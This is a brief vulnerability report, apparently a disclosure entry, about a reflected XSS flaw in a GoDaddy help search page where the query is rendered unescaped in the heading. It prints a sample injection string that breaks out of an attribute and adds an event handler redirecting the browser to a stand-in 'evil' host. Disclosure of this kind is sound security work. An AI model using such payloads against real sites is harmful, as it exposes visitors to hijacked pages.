XSS vulnerability through the help search results page.
The search query is sent as a GET parameter and is not escaped when rendered in the heading in the page, even though immediately after, it is escaped. This allows code to be executed directly from a malicious URL.
<h1 class="app-title"><span>Showing results for </span><a href="//uk.godaddy.com/help/search?q=bob" onloadend="document.location=http://evil"><b><i>bob" onloadend="document.location=http://evil</i></b></a></h1>
Reported Fixed UnknownBack